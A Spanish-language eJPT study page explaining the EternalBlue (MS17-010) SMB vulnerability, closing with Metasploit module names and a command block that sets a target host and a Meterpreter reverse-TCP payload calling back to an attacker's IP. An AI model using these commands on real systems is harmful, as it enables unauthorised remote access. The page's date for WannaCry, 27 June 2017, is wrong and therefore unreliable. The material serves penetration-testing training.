> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-windows/explotacion-de-la-vulnerabilidad-smb-ms17-010-de-windows-eternalblue.md).

# Explotación de la vulnerabilidad SMB MS17-010 de Windows (EternalBlue)

## 📌 ¿Qué es EternalBlue?

**EternalBlue** (identificado como **MS17-010** o **CVE-2017-0144**) es el nombre dado a una colección de vulnerabilidades y exploits en sistemas Windows que permiten a un atacante **ejecutar código de forma remota** y obtener acceso a un sistema Windows, y por ende, a la red de la que forma parte.

Este exploit fue **desarrollado originalmente por la NSA (Agencia de Seguridad Nacional de EE.UU.)**, y posteriormente **filtrado al público en 2017** por un grupo de hackers llamado **Shadow Brokers**.

***

## 🔧 ¿Cómo funciona?

EternalBlue explota una vulnerabilidad en el protocolo **SMBv1 (Server Message Block v1)** de Windows. Esta vulnerabilidad permite enviar **paquetes especialmente diseñados** que desencadenan la **ejecución de comandos arbitrarios** en el sistema víctima.

***

## 🦠 Caso real: WannaCry

El exploit EternalBlue fue utilizado en el **ataque de ransomware WannaCry**, ocurrido el **27 de junio de 2017**, para propagarse automáticamente entre sistemas Windows vulnerables dentro de redes corporativas y personales.

***

## 🖥️ Sistemas Afectados

Esta vulnerabilidad afecta a múltiples versiones de Windows, entre ellas:

* Windows Vista
* Windows 7
* Windows Server 2008
* Windows 8.1
* Windows Server 2012
* Windows 10
* Windows Server 2016

***

## 🛡️ ¿Está parcheado?

Microsoft lanzó un **parche de seguridad en marzo de 2017**, sin embargo, **muchos usuarios y empresas no actualizaron sus sistemas**, lo que permitió la propagación de ataques como WannaCry y NotPetya.

***

## 🎯 Explotación con Metasploit

Metasploit incluye:

* Un **módulo auxiliar** (`auxiliary/scanner/smb/smb_ms17_010`) para comprobar si un sistema es vulnerable.
* Un **módulo de exploit** (`exploit/windows/smb/ms17_010_eternalblue`) que puede ser utilizado para explotar sistemas no parcheados.

#### Ejemplo básico con MSF:

```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP objetivo>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <tu IP atacante>
set LPORT 4444
run
```

Si la explotación es exitosa, obtendrás una **sesión Meterpreter con privilegios** sobre el sistema remoto.
